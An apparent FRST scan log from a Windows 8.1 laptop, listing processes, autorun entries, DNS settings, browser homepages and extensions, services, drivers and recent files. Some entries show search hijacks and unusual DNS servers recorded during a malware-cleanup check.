(McAfee, Inc.) C:\Program Files\Common Files\McAfee\systemcore\mfefire.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.29.5\GoogleCrashHandler.exe
(Google Inc.) C:\Program Files (x86)\Google\Update\1.3.29.5\GoogleCrashHandler64.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\platform\McSvcHost\McSvHost.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Intel Corporation) C:\Windows\System32\igfxEM.exe
(Intel Corporation) C:\Windows\System32\igfxHK.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\systemcore\mfefire.exe
(McAfee, Inc.) C:\Program Files\mcafee\msc\McAPExe.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\AMCore\mcshield.exe
(Microsoft Corporation) C:\Windows\System32\SkyDrive.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Microsoft Corporation) C:\Windows\System32\SettingSyncHost.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\System32\GWX\GWX.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP System Event\HPMSGSVC.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\platform\McUICnt.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe
(McAfee, Inc.) C:\Program Files\Common Files\McAfee\CSP\1.8.203.0\McCSPServiceHost.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\Shared\hpqwmiex.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWelcome.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDScan.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdate.exe
(Farbar) C:\Users\Fawn\Desktop\FRST64 (2).exe
==================== Registry (Whitelisted) ===========================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [7637208 2014-09-12] (Realtek Semiconductor)
HKLM\...\Run: [DptfPolicyLpmServiceHelper] => C:\Windows\System32\DptfPolicyLpmServiceHelper.exe [111488 2014-09-05] (Intel Corporation)
HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2830576 2014-08-31] (Synaptics Incorporated)
HKLM-x32\...\Run: [Digital Coupon Print Driver] => "C:\Program Files (x86)\Digital Coupon Printer\DigitalCouponPrinter.exe"
HKLM-x32\...\Run: [SDTray] => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe [4101576 2014-06-24] (Safer-Networking Ltd.)
HKLM-x32\...\Run: [HPMessageService] => C:\Program Files (x86)\Hewlett-Packard\HP System Event\HPMSGSVC.exe [654088 2015-02-17] (Hewlett-Packard Development Company, L.P.)
Winlogon\Notify\SDWinLogon-x32: SDWinLogon.dll [X]
HKU\S-1-5-21-4258770641-917365270-2992294631-1001\...\Run: [SpybotPostWindows10UpgradeReInstall] => C:\Program Files\Common Files\AV\Spybot - Search and Destroy\Test.exe [1011200 2015-07-28] (Safer-Networking Ltd.)
HKU\S-1-5-21-4258770641-917365270-2992294631-1001\...\Run: [GoogleChromeAutoLaunch_C53FAD65C2D6926885C453276F0F49A1] => C:\Program Files (x86)\Google\Chrome\Application\chrome.exe [746648 2016-02-17] (Google Inc.)
HKU\S-1-5-21-4258770641-917365270-2992294631-1001\...\MountPoints2: {bfef5019-d8ba-11e5-8272-d85de287d87e} - "D:\windows\AutoRun.exe"
BootExecute: autocheck autochk * sdnclean64.exe
==================== Internet (Whitelisted) ====================
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.2.1
Tcpip\Parameters: [NameServer] 82.163.142.7 95.211.158.134
Tcpip\..\Interfaces\{2B499AA0-D03A-459F-AF7B-E066FC873886}: [DhcpNameServer] 192.168.2.1
Tcpip\..\Interfaces\{973F3F7C-2B68-428F-A390-4A495C50EDD8}: [DhcpNameServer] 82.163.142.7
Tcpip\..\Interfaces\{B1997D4E-969C-42FF-B8F2-0B5104AA2E37}: [DhcpNameServer] 82.163.142.7
Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://us.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_popjar_16_06_ssg02¶m1=1¶m2=f%3D1%26b%3DIE%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzu0D0AyD0D0EtBzzyB0DzzyB0D0F0AtC0EtN0D0Tzu0StCyEzyzytN1L2XzutAtFtCzztFtDtFtCtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2SyD0F0AyC0A0ByDyBtGyCtA0F0DtG0Czy0B0FtGyBtC0EtDtGtDyCzyzztAzyzz0FtDyE0F0D2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0F0D0B0FyByBtDyDtGyDyDzytAtGyE0E0DyEtG0AtDyByCtG0DtByD0A0ByEzytAtDyDzzyD2QtN0A0LzuyE%26cr%3D450508380%26a%3Dwncy_popjar_16_06_ssg02%26os_ver%3D6.3%26os%3DWindows%2B8.1%2BConnected
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxps://us.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_popjar_16_06_ssg02¶m1=1¶m2=f%3D1%26b%3DIE%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzu0D0AyD0D0EtBzzyB0DzzyB0D0F0AtC0EtN0D0Tzu0StCyEzyzytN1L2XzutAtFtCzztFtDtFtCtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2SyD0F0AyC0A0ByDyBtGyCtA0F0DtG0Czy0B0FtGyBtC0EtDtGtDyCzyzztAzyzz0FtDyE0F0D2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0F0D0B0FyByBtDyDtGyDyDzytAtGyE0E0DyEtG0AtDyByCtG0DtByD0A0ByEzytAtDyDzzyD2QtN0A0LzuyE%26cr%3D450508380%26a%3Dwncy_popjar_16_06_ssg02%26os_ver%3D6.3%26os%3DWindows%2B8.1%2BConnected
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://g.msn.com/HPNOT14/1
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://g.msn.com/HPNOT14/1
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,First Home Page = hxxp://g.msn.com/HPNOT14/1
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://g.msn.com/HPNOT14/1
HKU\S-1-5-21-4258770641-917365270-2992294631-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.google.com/
HKU\S-1-5-21-4258770641-917365270-2992294631-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://g.msn.com/HPNOT14/1
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://us.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_popjar_16_06_ssg02¶m1=1¶m2=f%3D4%26b%3DIE%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzu0D0AyD0D0EtBzzyB0DzzyB0D0F0AtC0EtN0D0Tzu0StCyEzyzytN1L2XzutAtFtCzztFtDtFtCtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2SyD0F0AyC0A0ByDyBtGyCtA0F0DtG0Czy0B0FtGyBtC0EtDtGtDyCzyzztAzyzz0FtDyE0F0D2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0F0D0B0FyByBtDyDtGyDyDzytAtGyE0E0DyEtG0AtDyByCtG0DtByD0A0ByEzytAtDyDzzyD2QtN0A0LzuyE%26cr%3D450508380%26a%3Dwncy_popjar_16_06_ssg02%26os_ver%3D6.3%26os%3DWindows%2B8.1%2BConnected&p={searchTerms}
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://us.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_popjar_16_06_ssg02¶m1=1¶m2=f%3D4%26b%3DIE%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzu0D0AyD0D0EtBzzyB0DzzyB0D0F0AtC0EtN0D0Tzu0StCyEzyzytN1L2XzutAtFtCzztFtDtFtCtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2SyD0F0AyC0A0ByDyBtGyCtA0F0DtG0Czy0B0FtGyBtC0EtDtGtDyCzyzztAzyzz0FtDyE0F0D2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0F0D0B0FyByBtDyDtGyDyDzytAtGyE0E0DyEtG0AtDyByCtG0DtByD0A0ByEzytAtDyDzzyD2QtN0A0LzuyE%26cr%3D450508380%26a%3Dwncy_popjar_16_06_ssg02%26os_ver%3D6.3%26os%3DWindows%2B8.1%2BConnected&p={searchTerms}
SearchScopes: HKLM -> {2f23ab71-4ac6-41f2-a955-ea576e553146} URL =
SearchScopes: HKLM-x32 -> {5D459A9E-3E68-439C-B3C7-036F3B49576B} URL = hxxp://www.amazon.com/s/ref=azs_osd_iea?ie=UTF-8&tag=hp-us2-vsb-20&link%5Fcode=qs&index=aps&field-keywords={searchTerms}
SearchScopes: HKU\S-1-5-21-4258770641-917365270-2992294631-1001 -> {5D459A9E-3E68-439C-B3C7-036F3B49576B} URL = hxxp://www.amazon.com/s/ref=azs_osd_iea?ie=UTF-8&tag=hp-us2-vsb-20&link%5Fcode=qs&index=aps&field-keywords={searchTerms}
BHO: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPluginx64.dll => No File
BHO-x32: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll [2015-12-20] (Hewlett-Packard Company)
Filter: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\Program Files\mcafee\msc\McSnIePl64.dll [2016-01-08] (McAfee, Inc.)
Filter-x32: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\Program Files (x86)\McAfee\msc\McSnIePl.dll [2016-01-08] (McAfee, Inc.)
StartMenuInternet: IEXPLORE.EXE - iexplore.exe
FireFox:
========
FF ProfilePath: C:\Users\Fawn\AppData\Roaming\Mozilla\Firefox\Profiles\jhz1k2y6.default
FF NewTab: about:newtab
FF DefaultSearchEngine: Search Provided by Yahoo
FF DefaultSearchEngine.US: Search Provided by Yahoo
FF SelectedSearchEngine: Search Provided by Yahoo
FF Homepage: hxxps://www.google.com/?gws_rd=ssl
about:preferences
FF Plugin: @mcafee.com/MSC,version=10 -> c:\PROGRA~1\mcafee\msc\NPMCSN~1.DLL [2016-01-08] ()
FF Plugin-x32: @mcafee.com/MSC,version=10 -> c:\PROGRA~2\mcafee\msc\NPMCSN~1.DLL [2016-01-08] ()
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-03] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-03] (Google Inc.)
FF Plugin HKU\S-1-5-21-4258770641-917365270-2992294631-1001: @citrixonline.com/appdetectorplugin -> C:\Users\Fawn\AppData\Local\Citrix\Plugins\104\npappdetector.dll [2016-03-03] (Citrix Online)
FF Extension: Simple YouTube to MP3/MP4 Converter and Downloader - C:\Users\Fawn\AppData\Roaming\Mozilla\Firefox\Profiles\jhz1k2y6.default\Extensions\jid0-SQnwtgW1b8BsMB5PLV5WScEDWOjw@jetpack.xpi [2016-03-03]
FF Extension: Youtube MP3 Downloader using youtube-mp3.org - C:\Users\Fawn\AppData\Roaming\Mozilla\Firefox\Profiles\jhz1k2y6.default\Extensions\jid1-xKH0EoS44u1a2w@jetpack.xpi [2016-02-08]
FF HKLM-x32\...\Thunderbird\Extensions: [msktbird@mcafee.com] - C:\Program Files\McAfee\MSK
FF Extension: McAfee Anti-Spam Thunderbird Extension - C:\Program Files\McAfee\MSK [2016-02-12] [not signed]
StartMenuInternet: FIREFOX.EXE - firefox.exe
Chrome:
=======
CHR HomePage: Default -> hxxps://us.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_popjar_16_06_ssg02¶m1=1¶m2=f%3D1%26b%3DChrome%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzu0D0AyD0D0EtBzzyB0DzzyB0D0F0AtC0EtN0D0Tzu0StCyEzyzytN1L2XzutAtFtCzztFtDtFtCtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2SyD0F0AyC0A0ByDyBtGyCtA0F0DtG0Czy0B0FtGyBtC0EtDtGtDyCzyzztAzyzz0FtDyE0F0D2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0F0D0B0FyByBtDyDtGyDyDzytAtGyE0E0DyEtG0AtDyByCtG0DtByD0A0ByEzytAtDyDzzyD2QtN0A0LzuyE%26cr%3D450508380%26a%3Dwncy_popjar_16_06_ssg02%26os_ver%3D6.3%26os%3DWindows%2B8.1%2BConnected
CHR StartupUrls: Default -> "hxxps://us.search.yahoo.com/yhs/web?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_popjar_16_06_ssg02¶m1=1¶m2=f%3D7%26b%3DChrome%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzu0D0AyD0D0EtBzzyB0DzzyB0D0F0AtC0EtN0D0Tzu0StCyEzyzytN1L2XzutAtFtCzztFtDtFtCtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2SyD0F0AyC0A0ByDyBtGyCtA0F0DtG0Czy0B0FtGyBtC0EtDtGtDyCzyzztAzyzz0FtDyE0F0D2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0F0D0B0FyByBtDyDtGyDyDzytAtGyE0E0DyEtG0AtDyByCtG0DtByD0A0ByEzytAtDyDzzyD2QtN0A0LzuyE%26cr%3D450508380%26a%3Dwncy_popjar_16_06_ssg02%26os_ver%3D6.3%26os%3DWindows%2B8.1%2BConnected"
CHR DefaultSearchURL: Default -> hxxps://us.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wncy_popjar_16_06_ssg02¶m1=1¶m2=f%3D4%26b%3DChrome%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzu0D0AyD0D0EtBzzyB0DzzyB0D0F0AtC0EtN0D0Tzu0StCyEzyzytN1L2XzutAtFtCzztFtDtFtCtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2SyD0F0AyC0A0ByDyBtGyCtA0F0DtG0Czy0B0FtGyBtC0EtDtGtDyCzyzztAzyzz0FtDyE0F0D2QtN1M1F1B2Z1V1N2Y1L1Qzu2S0F0D0B0FyByBtDyDtGyDyDzytAtGyE0E0DyEtG0AtDyByCtG0DtByD0A0ByEzytAtDyDzzyD2QtN0A0LzuyE%26cr%3D450508380%26a%3Dwncy_popjar_16_06_ssg02%26os_ver%3D6.3%26os%3DWindows%2B8.1%2BConnected&p={searchTerms}
CHR DefaultSearchKeyword: Default -> search provided by yahoo.com
CHR DefaultSuggestURL: Default -> {google:baseSuggestURL}search?client=chrome&hl={language}&q={searchTerms}
CHR Session Restore: Default -> is enabled.
CHR Profile: C:\Users\Fawn\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Slides) - C:\Users\Fawn\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-11-23]
CHR Extension: (Google Docs) - C:\Users\Fawn\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-11-23]
CHR Extension: (Google Drive) - C:\Users\Fawn\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-11-23]
CHR Extension: (YouTube) - C:\Users\Fawn\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-11-23]
CHR Extension: (Google Search) - C:\Users\Fawn\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-11-23]
CHR Extension: (Page Eraser) - C:\Users\Fawn\AppData\Local\Google\Chrome\User Data\Default\Extensions\ekofpchjmoalonajopdeegdappocgcmj [2016-03-04]
CHR Extension: (Test IE) - C:\Users\Fawn\AppData\Local\Google\Chrome\User Data\Default\Extensions\eldlkpeoddgbmpjlnpfblfpgodnojfjl [2016-02-18]
CHR Extension: (Google Sheets) - C:\Users\Fawn\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-11-23]
CHR Extension: (Google Docs Offline) - C:\Users\Fawn\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2015-11-24]
CHR Extension: (Popup Blocker Pro) - C:\Users\Fawn\AppData\Local\Google\Chrome\User Data\Default\Extensions\kiodaajmphnkcajieajajinghpejdjai [2016-03-03]
CHR Extension: (McAfee SECURE Safe Browsing) - C:\Users\Fawn\AppData\Local\Google\Chrome\User Data\Default\Extensions\lkdiimaiohgpacfbgedcipmgigppaofn [2016-03-03]
CHR Extension: (FromDocToPDF) - C:\Users\Fawn\AppData\Local\Google\Chrome\User Data\Default\Extensions\mallpejgeafdahhflmliiahjdpgbegpk [2016-03-04]
CHR Extension: (BrowserStack Local) - C:\Users\Fawn\AppData\Local\Google\Chrome\User Data\Default\Extensions\mfiddfehmfdojjfdpfngagldgaaafcfo [2016-01-28]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Fawn\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2015-11-23]
CHR Extension: (Gmail) - C:\Users\Fawn\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-11-23]
CHR Extension: (Open With Firefox) - C:\Users\Fawn\AppData\Local\Google\Chrome\User Data\Default\Extensions\poeacjbaiakjnaepdjgggojcjoajakmd [2016-03-03]
==================== Services (Whitelisted) ========================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
S2 BcmBtRSupport; C:\Windows\system32\BtwRSupportService.exe [2251992 2013-11-13] (Broadcom Corporation.)
R2 DptfParticipantAcpiProcessorService; C:\Windows\system32\DptfParticipantProcessorService.exe [115656 2014-09-05] (Intel Corporation)
R2 HomeNetSvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [453520 2016-01-03] (McAfee, Inc.)
R2 HPSupportSolutionsFrameworkService; C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe [26168 2015-12-20] (Hewlett-Packard Company)
R2 HPWMISVC; C:\Program Files (x86)\Hewlett-Packard\HP System Event\HPWMISVC.exe [608520 2015-02-17] (Hewlett-Packard Development Company, L.P.)
R2 igfxCUIService1.0.0.0; C:\Windows\system32\igfxCUIService.exe [318568 2014-09-12] (Intel Corporation)
R2 Intel(R) Capability Licensing Service Interface; C:\Program Files\Intel\TXE Components\TCS\HeciServer.exe [733696 2013-07-01] (Intel(R) Corporation) [File not signed]
S3 Intel(R) Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\TXE Components\TCS\SocketHeciServer.exe [822232 2013-07-01] (Intel(R) Corporation)
R2 McAPExe; C:\Program Files\McAfee\MSC\McAPExe.exe [863448 2016-01-08] (McAfee, Inc.)
S3 McAWFwk; c:\Program Files\Common Files\McAfee\ActWiz\McAWFwk.exe [332528 2014-03-12] (McAfee, Inc.)
R2 mcbootdelaystartsvc; C:\Program Files\Common Files\McAfee\platform\McSvcHost\McSvHost.exe [453520 2016-01-03] (McAfee, Inc.)
R2 mccspsvc; C:\Program Files\Common Files\McAfee\CSP\1.8.203.0\McCSPServiceHost.exe [1694152 2015-12-02] (McAfee, Inc.)
R2 McMPFSvc; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [453520 2016-01-03] (McAfee, Inc.)
R2 McNaiAnn; C:\Program Files\Common Files\McAfee\platform\McSvcHost\McSvHost.exe [453520 2016-01-03] (McAfee, Inc.)
S3 McODS; C:\Program Files\mcafee\VirusScan\mcods.exe [681680 2016-01-08] (McAfee, Inc.)
S4 McOobeSv2; C:\Program Files\Common Files\McAfee\platform\McSvcHost\McSvHost.exe [453520 2016-01-03] (McAfee, Inc.)
R2 mcpltsvc; C:\Program Files\Common Files\McAfee\platform\McSvcHost\McSvHost.exe [453520 2016-01-03] (McAfee, Inc.)
R2 McProxy; C:\Program Files\Common Files\McAfee\platform\McSvcHost\McSvHost.exe [453520 2016-01-03] (McAfee, Inc.)
R3 mfefire; C:\Program Files\Common Files\McAfee\SystemCore\\mfefire.exe [234192 2015-11-18] (McAfee, Inc.)
R2 mfemms; C:\Program Files\Common Files\McAfee\SystemCore\\mfemms.exe [380896 2016-01-21] (McAfee, Inc.)
R2 mfevtp; C:\Windows\system32\mfevtps.exe [275368 2015-11-18] (McAfee, Inc.)
R2 MSK80Service; C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe [453520 2016-01-03] (McAfee, Inc.)
R2 PEFService; C:\Program Files\Common Files\Intel Security\PEF\CORE\PEFService.exe [902112 2015-12-14] (Intel Security, Inc.)
R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [292568 2014-09-12] (Realtek Semiconductor)
R2 SDScannerService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe [1738168 2014-06-24] (Safer-Networking Ltd.)
R2 SDUpdateService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe [2088408 2014-06-27] (Safer-Networking Ltd.)
R2 SDWSCService; C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe [171928 2014-04-25] (Safer-Networking Ltd.)
R2 SynTPEnhService; C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [191728 2014-08-31] (Synaptics Incorporated)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [368632 2015-01-19] (Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [23792 2015-01-19] (Microsoft Corporation)
===================== Drivers (Whitelisted) ==========================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
S3 androidusb; C:\Windows\System32\Drivers\androidusb.sys [38424 2010-10-18] (Google Inc)
S3 AX88772; C:\Windows\system32\DRIVERS\ax88772.sys [113864 2013-07-18] (ASIX Electronics Corp.)
R3 bcbtums; C:\Windows\system32\drivers\bcbtums.sys [170712 2013-11-13] (Broadcom Corporation.)
R3 BCM43XX; C:\Windows\system32\DRIVERS\bcmwl63a.sys [7552760 2016-03-03] (Broadcom Corporation)
R3 cfwids; C:\Windows\System32\drivers\cfwids.sys [79248 2015-11-25] (McAfee, Inc.)
R3 DptfDevAcpiProc; C:\Windows\system32\DRIVERS\DptfDevAcpiProc.sys [198808 2014-09-05] (Intel Corporation)
S3 DptfDevDisplay; C:\Windows\System32\drivers\DptfDevDisplay.sys [70752 2014-09-05] (Intel Corporation)
S3 DptfDevDram; C:\Windows\System32\drivers\DptfDevDram.sys [145640 2014-09-05] (Intel Corporation)
S3 DptfDevFan; C:\Windows\System32\drivers\DptfDevFan.sys [50640 2014-09-05] (Intel Corporation)
R3 DptfDevGen; C:\Windows\system32\DRIVERS\DptfDevGen.sys [78504 2014-09-05] (Intel Corporation)
S3 DptfDevPch; C:\Windows\System32\drivers\DptfDevPch.sys [116752 2014-09-05] (Intel Corporation)
S3 DptfDevPower; C:\Windows\System32\drivers\DptfDevPower.sys [71808 2014-09-05] (Intel Corporation)
R3 DptfManager; C:\Windows\system32\DRIVERS\DptfManager.sys [493240 2014-09-05] (Intel Corporation)
S0 ebdrv; C:\Windows\System32\drivers\evbda.sys [3357024 2013-08-22] (Broadcom Corporation)
S3 HipShieldK; C:\Windows\System32\drivers\HipShieldK.sys [207208 2015-05-19] (McAfee, Inc.)
R0 MBI; C:\Windows\System32\drivers\MBI.sys [29464 2014-08-04] (Intel Corporation)
R3 mfeaack; C:\Windows\System32\drivers\mfeaack.sys [419624 2015-11-25] (McAfee, Inc.)
R3 mfeavfk; C:\Windows\System32\drivers\mfeavfk.sys [351144 2015-11-25] (McAfee, Inc.)
S0 mfeelamk; C:\Windows\System32\drivers\mfeelamk.sys [83096 2015-11-25] (McAfee, Inc.)
R3 mfefirek; C:\Windows\System32\drivers\mfefirek.sys [496368 2015-11-25] (McAfee, Inc.)
R0 mfehidk; C:\Windows\System32\drivers\mfehidk.sys [846080 2015-11-25] (McAfee, Inc.)
R3 mfencbdc; C:\Windows\System32\DRIVERS\mfencbdc.sys [539496 2015-11-20] (McAfee, Inc.)
S3 mfencrk; C:\Windows\System32\DRIVERS\mfencrk.sys [109480 2015-11-20] (McAfee, Inc.)
R0 mfewfpk; C:\Windows\System32\drivers\mfewfpk.sys [245096 2015-11-25] (McAfee, Inc.)
R3 RSP2STOR; C:\Windows\system32\DRIVERS\RtsP2Stor.sys [294104 2014-08-25] (Realtek Semiconductor Corp.)
S3 SmbDrv; C:\Windows\System32\drivers\Smb_driver_AMDASF.sys [30448 2014-08-31] (Synaptics Incorporated)
R3 SmbDrvI; C:\Windows\system32\DRIVERS\Smb_driver_Intel.sys [31472 2014-08-31] (Synaptics Incorporated)
R3 TXEIx64; C:\Windows\System32\drivers\TXEIx64.sys [88592 2014-01-15] (Intel Corporation)
S3 WdBoot; C:\Windows\system32\drivers\WdBoot.sys [35320 2015-01-19] (Microsoft Corporation)
S3 WdFilter; C:\Windows\system32\drivers\WdFilter.sys [258368 2015-01-19] (Microsoft Corporation)
S3 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [114496 2015-01-19] (Microsoft Corporation)
R3 WirelessButtonDriver; C:\Windows\System32\drivers\WirelessButtonDriver64.sys [20800 2013-07-22] (Hewlett-Packard Development Company, L.P.)
S3 iscFlash; \??\C:\Windows\TEMP\7zS1773.tmp\iscflashx64.sys [X]
==================== NetSvcs (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
==================== One Month Created files and folders ========
(If an entry is included in the fixlist, the file/folder will be moved.)
2016-03-04 10:04 - 2016-03-04 10:04 - 00025316 _____ C:\Users\Fawn\Desktop\FRST.txt
2016-03-04 10:02 - 2016-03-04 10:02 - 02374144 _____ (Farbar) C:\Users\Fawn\Desktop\FRST64 (2).exe
2016-03-04 09:21 - 2016-03-04 10:04 - 00000000 ____D C:\FRST
2016-03-04 09:11 - 2016-03-04 09:11 - 00000207 _____ C:\Windows\tweaking.com-regbackup-FAWNS-Windows-8.1-Connected-(64-bit).dat
2016-03-04 09:11 - 2016-03-04 09:11 - 00000000 ____D C:\RegBackup
2016-03-04 09:08 - 2016-03-04 09:08 - 00002258 _____ C:\Users\Public\Desktop\Tweaking.com - Registry Backup.lnk
2016-03-04 09:08 - 2016-03-04 09:08 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Tweaking.com
2016-03-04 09:08 - 2016-03-04 09:08 - 00000000 ____D C:\Program Files (x86)\Tweaking.com
2016-03-04 09:07 - 2016-03-04 09:08 - 00016383 _____ C:\Windows\Tweaking.com - Registry Backup Setup Log.txt
2016-03-04 08:55 - 2016-03-04 09:03 - 00000000 ____D C:\AdwCleaner
